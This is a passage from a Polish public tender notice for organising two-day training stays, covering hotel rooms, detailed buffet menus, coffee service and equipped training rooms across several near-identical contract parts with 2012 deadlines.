1.8.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.9.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.10.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.11.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.12.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.13.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje: Zorganizowanie pobytu uczestników 6 szkoleń         2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej                   w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 8 pokoi 2 osobowych, 14 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny                                 (z całodobowym dostępem do zimnej i ciepłej wody) i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (przewodowy lub wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 10.00 pierwszego dnia pobytu i trwa do godz.17.00 drugiego dnia pobytu.
1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.5.1.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
-zupa (minimum dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata ( różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) na bieżąco uzupełniania w godzinach od 19:30 do 24:00
danie na ciepło (3 do wyboru)
Bez ograniczeń ilościowych:
-sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
-przystawki (wybór zimnych przekąsek mięsnych i rybnych)
-wędliny (różnorodne, minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe) 
-warzywa (świeże i konserwowe)
-pieczywo (różnorodne- jasne, ciemne, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.5.3.Śniadanie w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
-wędliny (różnorodne- minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe)
-dżemy
-jajka
-płatki śniadaniowe, muesli
-mleko (ciepłe i zimne)
-jogurty
-świeże owoce
-pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)herbata (różnorodna: czarna, zielona, owocowa)woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
-przystawki (wybór zimnych przekąsek mięsnych, rybnych)
-zupa (dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna: czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.6.Wykonawca zapewni dla każdego uczestnika szkolenia suchy prowiant na podróż obejmujący: kanapkę, owoc, ciasto/baton, sok w kartoniku, wodę mineralną.
1.7.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną-z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną- czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sal szkoleniowych.
1.8.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.9.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.10.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.11.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.12.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.13.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje: Zorganizowanie pobytu uczestników 6 szkoleń         2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej                   w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 8 pokoi 2 osobowych, 14 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny                                 (z całodobowym dostępem do zimnej i ciepłej wody) i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (przewodowy lub wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 10.00 pierwszego dnia pobytu i trwa do godz.17.00 drugiego dnia pobytu.
1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.5.1.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
-zupa (minimum dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata ( różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) na bieżąco uzupełniania w godzinach od 19:30 do 24:00
danie na ciepło (3 do wyboru)
Bez ograniczeń ilościowych:
-sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
-przystawki (wybór zimnych przekąsek mięsnych i rybnych)
-wędliny (różnorodne, minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe) 
-warzywa (świeże i konserwowe)
-pieczywo (różnorodne- jasne, ciemne, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.5.3.Śniadanie w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
-wędliny (różnorodne- minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe)
-dżemy
-jajka
-płatki śniadaniowe, muesli
-mleko (ciepłe i zimne)
-jogurty
-świeże owoce
-pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)herbata (różnorodna: czarna, zielona, owocowa)woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
-przystawki (wybór zimnych przekąsek mięsnych, rybnych)
-zupa (dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna: czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.6.Wykonawca zapewni dla każdego uczestnika szkolenia suchy prowiant na podróż obejmujący: kanapkę, owoc, ciasto/baton, sok w kartoniku, wodę mineralną.
1.7.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną-z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną- czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sal szkoleniowych.
1.8.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.9.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.10.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.11.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.12.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.13.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje: Zorganizowanie pobytu uczestników 6 szkoleń         2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej                   w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 8 pokoi 2 osobowych, 14 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny                                 (z całodobowym dostępem do zimnej i ciepłej wody) i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (przewodowy lub wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 10.00 pierwszego dnia pobytu i trwa do godz.17.00 drugiego dnia pobytu.
1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.5.1.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
-zupa (minimum dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata ( różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) na bieżąco uzupełniania w godzinach od 19:30 do 24:00
danie na ciepło (3 do wyboru)
Bez ograniczeń ilościowych:
-sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
-przystawki (wybór zimnych przekąsek mięsnych i rybnych)
-wędliny (różnorodne, minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe) 
-warzywa (świeże i konserwowe)
-pieczywo (różnorodne- jasne, ciemne, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.5.3.Śniadanie w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
-wędliny (różnorodne- minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe)
-dżemy
-jajka
-płatki śniadaniowe, muesli
-mleko (ciepłe i zimne)
-jogurty
-świeże owoce
-pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)herbata (różnorodna: czarna, zielona, owocowa)woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
-przystawki (wybór zimnych przekąsek mięsnych, rybnych)
-zupa (dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna: czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.6.Wykonawca zapewni dla każdego uczestnika szkolenia suchy prowiant na podróż obejmujący: kanapkę, owoc, ciasto/baton, sok w kartoniku, wodę mineralną.
1.7.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną-z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną- czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sal szkoleniowych.
1.8.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.9.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.10.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.11.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.12.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.13.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje: Zorganizowanie pobytu uczestników 6 szkoleń         2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej                   w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 8 pokoi 2 osobowych, 14 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny                                 (z całodobowym dostępem do zimnej i ciepłej wody) i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (przewodowy lub wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 10.00 pierwszego dnia pobytu i trwa do godz.17.00 drugiego dnia pobytu.
1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.5.1.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
-zupa (minimum dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata ( różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) na bieżąco uzupełniania w godzinach od 19:30 do 24:00
danie na ciepło (3 do wyboru)
Bez ograniczeń ilościowych:
-sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
-przystawki (wybór zimnych przekąsek mięsnych i rybnych)
-wędliny (różnorodne, minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe) 
-warzywa (świeże i konserwowe)
-pieczywo (różnorodne- jasne, ciemne, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.5.3.Śniadanie w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
-wędliny (różnorodne- minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe)
-dżemy
-jajka
-płatki śniadaniowe, muesli
-mleko (ciepłe i zimne)
-jogurty
-świeże owoce
-pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)herbata (różnorodna: czarna, zielona, owocowa)woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
-przystawki (wybór zimnych przekąsek mięsnych, rybnych)
-zupa (dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna: czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.6.Wykonawca zapewni dla każdego uczestnika szkolenia suchy prowiant na podróż obejmujący: kanapkę, owoc, ciasto/baton, sok w kartoniku, wodę mineralną.
1.7.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną-z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną- czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sal szkoleniowych.
1.8.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.9.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.10.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.11.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.12.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.13.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje: Zorganizowanie pobytu uczestników 6 szkoleń         2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej                   w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 8 pokoi 2 osobowych, 14 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny                                 (z całodobowym dostępem do zimnej i ciepłej wody) i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (przewodowy lub wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 10.00 pierwszego dnia pobytu i trwa do godz.17.00 drugiego dnia pobytu.
1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.5.1.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
-zupa (minimum dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata ( różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
